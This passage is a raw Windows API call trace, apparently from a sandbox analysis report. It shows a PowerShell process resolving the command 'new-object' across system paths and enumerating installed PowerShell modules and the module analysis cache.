lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0111.833] FindFirstFileW (in: lpFileName="C:\\Windows\\new-object.*" (normalized: "c:\\windows\\new-object.*"), lpFindFileData=0x5a0e7f4 | out: lpFindFileData=0x5a0e7f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0111.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e79c) returned 1 [0111.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e9fc) returned 1 [0111.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0111.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0111.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e788) returned 1 [0111.834] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\syswow64\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea4c | out: lpFileInformation=0x5a0ea4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x123dcea, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x496a9b80, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496a9b80, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0111.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e784) returned 1 [0111.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea44) returned 1 [0111.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0111.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0111.835] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\new-object.*" (normalized: "c:\\windows\\syswow64\\wbem\\new-object.*"), lpFindFileData=0x5a0e7f4 | out: lpFindFileData=0x5a0e7f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0111.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e79c) returned 1 [0111.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e9fc) returned 1 [0111.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0111.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0111.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e788) returned 1 [0111.855] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea4c | out: lpFileInformation=0x5a0ea4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0111.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e784) returned 1 [0111.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea44) returned 1 [0111.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0111.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0111.856] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\new-object.*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\new-object.*"), lpFindFileData=0x5a0e7f4 | out: lpFindFileData=0x5a0e7f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0111.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e79c) returned 1 [0111.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e9fc) returned 1 [0111.861] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x5a0e8e0, nSize=0xc9 | out: lpBuffer="") returned 0xc5 [0111.881] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0111.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea74) returned 1 [0111.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2b [0111.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x2b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0111.885] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x5a0e824 | out: lpFindFileData=0x5a0e824*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e2a0 [0111.886] FindNextFileW (in: hFindFile=0x68e2a0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0111.886] FindNextFileW (in: hFindFile=0x68e2a0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0111.886] FindNextFileW (in: hFindFile=0x68e2a0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0111.886] FindNextFileW (in: hFindFile=0x68e2a0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0111.886] FindClose (in: hFindFile=0x68e2a0 | out: hFindFile=0x68e2a0) returned 1 [0111.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e4) returned 1 [0111.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ea44) returned 1 [0111.887] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0111.887] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0111.888] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0111.888] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0111.888] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0111.888] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0111.889] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0111.889] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0111.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0111.890] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0111.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0111.891] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0111.891] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0111.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0111.892] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0111.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0111.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea74) returned 1 [0111.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0111.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0111.893] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x5a0e824 | out: lpFindFileData=0x5a0e824*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e2a0 [0111.893] FindNextFileW (in: hFindFile=0x68e2a0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0111.893] FindNextFileW (in: hFindFile=0x68e2a0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49b46620, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49b46620, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0111.893] FindNextFileW (in: hFindFile=0x68e2a0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0111.893] FindClose (in: hFindFile=0x68e2a0 | out: hFindFile=0x68e2a0) returned 1 [0111.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e4) returned 1 [0111.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ea44) returned 1 [0111.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0111.894] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0111.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c8) returned 1 [0111.894] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea8c | out: lpFileInformation=0x5a0ea8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b46620, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea9fba0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea9fba0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0111.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c4) returned 1 [0111.903] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0111.903] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0111.904] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0111.904] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0111.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7ec) returned 1 [0111.904] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x259efb4 | out: lpFileInformation=0x259efb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b46620, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea9fba0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea9fba0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0111.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e8) returned 1 [0111.910] GetEnvironmentVariableW (in: lpName="PSModuleAnalysisCachePath", lpBuffer=0x5a0da94, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0111.910] CoTaskMemAlloc (cb=0x20c) returned 0x5bc6d28 [0111.910] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5bc6d28 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0111.910] CoTaskMemFree (pv=0x5bc6d28) [0111.910] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x21 [0111.910] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x21, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0111.911] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0x2020 [0111.914] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0111.914] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x51 [0111.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e240) returned 1 [0111.914] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d0 [0111.914] GetFileType (hFile=0x3d0) returned 0x1 [0111.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e23c) returned 1 [0111.914] GetFileType (hFile=0x3d0) returned 0x1 [0111.915] ReadFile (in: hFile=0x3d0, lpBuffer=0x25a010c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e2b4, lpOverlapped=0x0 | out: lpBuffer=0x25a010c*, lpNumberOfBytesRead=0x5a0e2b4*=0x1000, lpOverlapped=0x0) returned 1 [0111.931] ReadFile (in: hFile=0x3d0, lpBuffer=0x259fce7, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x5a0e2bc, lpOverlapped=0x0 | out: lpBuffer=0x259fce7*, lpNumberOfBytesRead=0x5a0e2bc*=0x1, lpOverlapped=0x0) returned 1 [0111.931] ReadFile (in: hFile=0x3d0, lpBuffer=0x25a010c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e2a8, lpOverlapped=0x0 | out: lpBuffer=0x25a010c*, lpNumberOfBytesRead=0x5a0e2a8*=0x1000, lpOverlapped=0x0) returned 1 [0111.934] ReadFile (in: hFile=0x3d0, lpBuffer=0x259fce5, nNumberOfBytesToRead=0x13, lpNumberOfBytesRead=0x5a0e2bc, lpOverlapped=0x0 | out: lpBuffer=0x259fce5*, lpNumberOfBytesRead=0x5a0e2bc*=0x13, lpOverlapped=0x0) returned 1 [0111.934] ReadFile (in: hFile=0x3d0, lpBuffer=0x25a010c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a010c*, lpNumberOfBytesRead=0x5a0e2bc*=0x1000, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x3d0, lpBuffer=0x25a010c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a010c*, lpNumberOfBytesRead=0x5a0e2bc*=0x4fd, lpOverlapped=0x0) returned 1 [0111.941] GetEnvironmentVariableW (in: lpName="PSDisableModuleAnalysisCacheCleanup", lpBuffer=0x5a0e114, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0111.954] CloseHandle (hObject=0x3d0) returned 1 [0111.955] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0111.955] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0111.955] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0111.956] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0111.956] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0111.956] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0111.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea74) returned 1 [0111.956] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0111.956] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0111.957] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" 